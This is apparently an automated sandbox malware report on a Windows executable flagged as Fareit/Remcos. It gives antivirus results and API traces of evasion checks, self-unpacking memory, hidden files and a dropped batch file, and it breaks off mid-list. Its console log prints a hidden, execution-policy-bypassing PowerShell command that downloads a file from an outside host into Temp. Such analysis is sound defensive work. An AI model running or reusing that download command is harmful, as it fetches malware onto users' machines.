10.6
0-day

6f6784e7f92eab0529d5da3aaa0fed31320ec319b6a6c6beda8341d77113234f

23867decc4f3176a9541bd62ec495bf7.exe

Analysis duration

74s

Last analyzed

File size

925.0KB
Static and dynamic detection tags: 5GW@A0CWKUNI AGEN AI SCORE=89 AIDETECTVM ATTRIBUTE BUZUS CLASSIC CONFIDENCE DELF DOWNLOADER32 EJUL EKCN FAREIT GDSDA GTCBNV HIGH CONFIDENCE HIGHCONFIDENCE HQBU KRYPTIK MALWARE1 MALWARE@#SF2XND9AS17X R06EC0PIA20 REMCOS REMCOSCRYPT SCORE SONBOKLI SUSGEN TQYQ TSCOPE UNSAFE ZELPHIF
Eagle Eye engine
Not detected: no Eagle Eye engine results yet
Static verdict
Antivirus engines
Scan engine Scan result Scan time Engine version
Alibaba Trojan:Win32/Injector.9d9b71b5 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:Inject-XW [Trj] 20201229 21.1.5827.0
Kingsoft 20201229 2017.9.26.565
McAfee Fareit-FRD!23867DECC4F3 20201229 6.0.6.653
Tencent Win32.Trojan.Generic.Hqbu 20201229 1.0.0.1
CrowdStrike win/malicious_confidence_80% (W) 20190702 1.0
Static indicators
Queries for the computername (7 events)
Time & API Arguments Status Return Repeated
1619301874.000999
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619301874.015999
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619301874.015999
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619301874.031999
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619301878.390999
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619301878.390999
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619301880.062999
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Checks if process is being debugged by a debugger (1 event)
Time & API Arguments Status Return Repeated
1619301874.578999
IsDebuggerPresent
failed 0 0
Command line console output was observed (20 events)
Time & API Arguments Status Return Repeated
1619301871.782374
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619301871.797374
WriteConsoleW
buffer: powershell.exe
console_handle: 0x00000007
success 1 0
1619301871.797374
WriteConsoleW
buffer: -ExecutionPolicy Bypass -WindowStyle Hidden -Command tas;(new-object System.Net.WebClient).DownloadFile('https://share.dmca.gripe/RSlUa63cBf5DkEfs','C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\23867decc4f3176a9541bd62ec495')
console_handle: 0x00000007
success 1 0
1619301879.562999
WriteConsoleW
buffer: 无法将“tas”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。请检查名称的拼
console_handle: 0x00000023
success 1 0
1619301879.593999
WriteConsoleW
buffer: 写,如果包括路径,请确保路径正确,然后重试。
console_handle: 0x0000002f
success 1 0
1619301879.625999
WriteConsoleW
buffer: 所在位置 行:1 字符: 4
console_handle: 0x0000003b
success 1 0
1619301879.656999
WriteConsoleW
buffer: + tas <<<< ;(new-object System.Net.WebClient).DownloadFile('https://share.dmca.
console_handle: 0x00000047
success 1 0
1619301879.687999
WriteConsoleW
buffer: gripe/RSlUa63cBf5DkEfs','C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\238
console_handle: 0x00000053
success 1 0
1619301879.703999
WriteConsoleW
buffer: 67decc4f3176a9541bd62ec495')
console_handle: 0x0000005f
success 1 0
1619301879.734999
WriteConsoleW
buffer: + CategoryInfo : ObjectNotFound: (tas:String) [], CommandNotFound
console_handle: 0x0000006b
success 1 0
1619301879.765999
WriteConsoleW
buffer: Exception
console_handle: 0x00000077
success 1 0
1619301879.781999
WriteConsoleW
buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000083
success 1 0
1619301886.203999
WriteConsoleW
buffer: 使用“2”个参数调用“DownloadFile”时发生异常:“基础连接已经关闭: 发送时发生错
console_handle: 0x000000a3
success 1 0
1619301886.234999
WriteConsoleW
buffer: 误。”
console_handle: 0x000000af
success 1 0
1619301886.250999
WriteConsoleW
buffer: 所在位置 行:1 字符: 51
console_handle: 0x000000bb
success 1 0
1619301886.265999
WriteConsoleW
buffer: + tas;(new-object System.Net.WebClient).DownloadFile <<<< ('https://share.dmca.
console_handle: 0x000000c7
success 1 0
1619301886.296999
WriteConsoleW
buffer: gripe/RSlUa63cBf5DkEfs','C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\238
console_handle: 0x000000d3
success 1 0
1619301886.312999
WriteConsoleW
buffer: 67decc4f3176a9541bd62ec495')
console_handle: 0x000000df
success 1 0
1619301886.343999
WriteConsoleW
buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000eb
success 1 0
1619301886.375999
WriteConsoleW
buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000f7
success 1 0
Uses Windows APIs to generate a cryptographic key (50 out of 66 events)
Time & API Arguments Status Return Repeated
1619301876.046999
CryptExportKey
crypto_handle: 0x0031eb80
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.046999
CryptExportKey
crypto_handle: 0x0031ea40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.046999
CryptExportKey
crypto_handle: 0x0031ea40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.046999
CryptExportKey
crypto_handle: 0x0031ea40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.125999
CryptExportKey
crypto_handle: 0x0031ea40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.125999
CryptExportKey
crypto_handle: 0x0031ea40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.125999
CryptExportKey
crypto_handle: 0x0031ea40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.140999
CryptExportKey
crypto_handle: 0x0031ea40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.171999
CryptExportKey
crypto_handle: 0x0031df80
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.171999
CryptExportKey
crypto_handle: 0x0031df80
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.218999
CryptExportKey
crypto_handle: 0x0031df80
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.218999
CryptExportKey
crypto_handle: 0x0031df80
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.218999
CryptExportKey
crypto_handle: 0x0031df80
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.218999
CryptExportKey
crypto_handle: 0x0031df80
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.640999
CryptExportKey
crypto_handle: 0x0031e4c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.640999
CryptExportKey
crypto_handle: 0x0031e4c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.656999
CryptExportKey
crypto_handle: 0x0031e4c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.656999
CryptExportKey
crypto_handle: 0x0031e4c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.656999
CryptExportKey
crypto_handle: 0x0031e4c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.656999
CryptExportKey
crypto_handle: 0x0031e4c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.671999
CryptExportKey
crypto_handle: 0x0031e4c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e3c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.093999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.093999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.140999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.140999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.218999
CryptExportKey
crypto_handle: 0x0031e7c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.218999
CryptExportKey
crypto_handle: 0x0031e7c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.218999
CryptExportKey
crypto_handle: 0x0031e7c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.234999
CryptExportKey
crypto_handle: 0x0031e7c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.234999
CryptExportKey
crypto_handle: 0x0031e7c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.234999
CryptExportKey
crypto_handle: 0x0031e7c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.250999
CryptExportKey
crypto_handle: 0x0031e7c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.312999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.312999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.453999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.453999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.468999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.468999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.468999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.484999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.484999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)
Time & API Arguments Status Return Repeated
1619269230.491633
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)
section CODE
section DATA
section BSS
The executable uses a known packer (1 event)
packer BobSoft Mini Delphi -> BoB / BobSoft
Behavioral verdict
Dynamic indicators
Allocates read-write-execute memory (usually to unpack itself) (50 out of 161 events)
Time & API Arguments Status Return Repeated
1619269229.553633
NtAllocateVirtualMemory
process_identifier: 472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003d0000
success 0 0
1619301874.140999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 1966080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x02a60000
success 0 0
1619301874.140999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02c00000
success 0 0
1619301874.484999
NtProtectVirtualMemory
process_identifier: 520
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x73f31000
success 0 0
1619301874.593999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0279a000
success 0 0
1619301874.593999
NtProtectVirtualMemory
process_identifier: 520
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x73f32000
success 0 0
1619301874.593999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02792000
success 0 0
1619301874.796999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027a2000
success 0 0
1619301874.875999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02c01000
success 0 0
1619301874.921999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02c02000
success 0 0
1619301875.140999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027ca000
success 0 0
1619301875.453999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027a3000
success 0 0
1619301875.718999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027a4000
success 0 0
1619301875.750999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027eb000
success 0 0
1619301875.750999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027e7000
success 0 0
1619301875.875999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0279b000
success 0 0
1619301875.984999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027c2000
success 0 0
1619301876.000999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027e5000
success 0 0
1619301876.375999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027a5000
success 0 0
1619301876.968999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027cc000
success 0 0
1619301877.140999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027c3000
success 0 0
1619301877.218999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x05400000
success 0 0
1619301877.390999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027a6000
success 0 0
1619301877.640999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027ec000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027c4000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027c5000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027c6000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027c7000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027c8000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027c9000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a0000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a1000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a2000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a3000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a4000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a5000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a6000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a7000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a8000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a9000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054aa000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054ab000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054ac000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054ad000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054ae000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054af000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054b0000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054b1000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054b2000
success 0 0
1619301877.875999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054b3000
success 0 0
Creates executable files on the filesystem (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Local\name.bat
Creates hidden or system file (1 event)
Time & API Arguments Status Return Repeated
1619269260.991633
SetFileAttributesW
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\23867decc4f3176a9541bd62ec495
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\23867decc4f3176a9541bd62ec495
failed 0 0
Creates a shortcut to an executable file (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
Creates a suspicious process (1 event)
